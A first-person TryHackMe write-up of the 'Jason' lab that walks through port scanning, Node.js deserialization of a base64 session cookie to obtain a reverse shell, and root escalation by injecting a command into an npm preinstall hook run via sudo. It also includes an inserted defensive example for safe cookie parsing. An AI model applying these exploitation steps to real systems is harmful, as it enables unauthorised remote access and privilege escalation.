Jason | TryHackMe writeup
In this article, I will demonstrate my approach to completing the Jason TryHackMe room.
The room is about a company with a weak front-end web server; our job is to perform a penetration test for them, find the vulnerabilities and help them secure their system.
So let's begin.
The scope: 10.10.135.87
Let's start by doing a fast Nmap scan for open ports using this command: nmap -p- -T4 10.10.135.87 --open -oN Nmap/Nmap-full-ports
The -p- does a full port scan, -T4 makes the scan faster than the default timing, --open shows only the open ports, and -oN saves the output, as I always like to keep a record of everything I do.
Oh great, we found two open TCP ports. By default these are most likely HTTP and SSH, so let's confirm that. I'm going to use this command: nmap -p80,22 -A 10.10.135.87 -oN Nmap/Nmap-services-discover
-p80,22 scans only the selected ports, and -A enables OS detection, version detection, script scanning and traceroute.
So now we are sure that port 80 is a web server and port 22 is SSH.
I searched for exploits for the versions of these two services but did not find anything, so I'm going to start enumerating the web server. I always like to start with directory scanners such as dirb or gobuster; in this case I'll start with dirb using this command: dirb https://10.10.135.87/
After a while it had not found any files or directories with the default wordlist I used, so I'm going to enumerate the web app manually.
As we can see, the web app has a form with an input for an email address. I'm going to enter a random email and intercept it with the Burp Suite proxy. As we can see, there's a parameter called email, so I'm going to send the request to Repeater to replay it manually. The app also sets a base64-encoded session cookie; after decoding it with echo "eyJlbWFpbCI6ImV4YW1wbGVAZXhhbXBsZS5jb20ifQ==" | base64 -d, it turned out to be a JavaScript object holding the email parameter and its value. That reminded me of deserialization vulnerabilities, where an attacker manipulates serialized objects in order to pass harmful data into the application code.
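The root cause here is that the server rebuilds a JavaScript object from a cookie the client fully controls. As an added example (not code from the writeup or the room), this is how a Node.js back end can read that same cookie safely: decode it, parse it with JSON.parse (which only ever produces data, never functions), and accept only the one field the app actually needs. The cookie value is the one decoded above; the single-field `{ email }` schema is an assumption.

```javascript
// Added example, not the room's code. Assumes the session cookie is base64 JSON
// with exactly one string field, "email", as seen in the decoded cookie above.

// Conservative email shape check; length cap keeps oversized values out of logs/DB.
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
const MAX_EMAIL_LEN = 254;

// Parse the session cookie. Returns { email } on success, or null for anything
// that is not a plain object carrying one valid email string. JSON.parse is used
// instead of a "rich" deserializer: it cannot reconstruct or execute functions,
// so a crafted cookie can at worst be rejected, not run.
function parseSessionCookie(cookieValue) {
  if (typeof cookieValue !== 'string' || cookieValue.length > 4096) return null;
  const text = Buffer.from(cookieValue, 'base64').toString('utf8');
  let obj;
  try {
    obj = JSON.parse(text);
  } catch {
    return null; // not JSON at all: treat as a forged or corrupted cookie
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) return null;
  const keys = Object.keys(obj);
  if (keys.length !== 1 || keys[0] !== 'email') return null; // no extra fields
  const email = obj.email;
  if (typeof email !== 'string') return null; // nested objects/functions rejected
  if (email.length > MAX_EMAIL_LEN || !EMAIL_RE.test(email)) return null;
  return { email };
}

// Build the cookie the same way, so both directions use plain JSON only.
function buildSessionCookie(email) {
  if (typeof email !== 'string' || !EMAIL_RE.test(email)) throw new TypeError('bad email');
  return Buffer.from(JSON.stringify({ email }), 'utf8').toString('base64');
}

// Constructed sample values for a stand-alone run.
const GOOD = 'eyJlbWFpbCI6ImV4YW1wbGVAZXhhbXBsZS5jb20ifQ=='; // {"email":"example@example.com"}
const NESTED = Buffer.from('{"email":{"x":1}}').toString('base64'); // object where a string is expected
console.log(parseSessionCookie(GOOD));   // { email: 'example@example.com' }
console.log(parseSessionCookie(NESTED)); // null
```

In an Express app this would replace whatever currently turns the cookie back into an object; if a request's cookie parses to null, drop the session and log it, since a well-behaved client never sends one.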
In order to gain access to the server I had to read more about Node.js deserialization vulnerabilities, and I ended up at an interesting article on exploit-db.
As they showed, I had to generate a Node.js shell using the nodejsshell.py script, which you can find on GitHub.
Generating the shell was very easy, using this command: python nodejsshell.py MY IP PORT NUMBER. It does not work on Python 3, so please make sure you are using python2.8, then serialize it.
After copying the shell, we have to base64-encode it to use it in the web app. I used the Burp encoder and set it in the session cookie, started a listener with nc -nvlp MY_PORT, and after refreshing the page we got the shell. To make the shell interactive I used: python3 -c "import pty;pty.spawn('/bin/bash')" && export TERM=xterm
Now we are dylan, so we have to escalate our privileges to root. I started with sudo -l to check which commands we can run as a superuser, and yes, we can run npm as a superuser.
Then I did some research to figure out how to exploit it, and I ended up at an article saying that we can inject our command into package.json. That is what I did: I injected the cp /root/root.txt command in the preinstall value, ran sudo /usr/bin/npm i /tmp/shell --unsafe-perm, and done, our root flag is in /tmp/flag. Of course, feel free to change the command to anything you want; for example, you can start a reverse TCP shell and connect as the root account :)
Please feel free to give me your feedback on my first CTF writeup.
And of course you can add me on TryHackMe; this is my username: Mohamadalsalty.
TryHackMe link: https://tryhackme.com/
Comment (3 years ago): Good one bro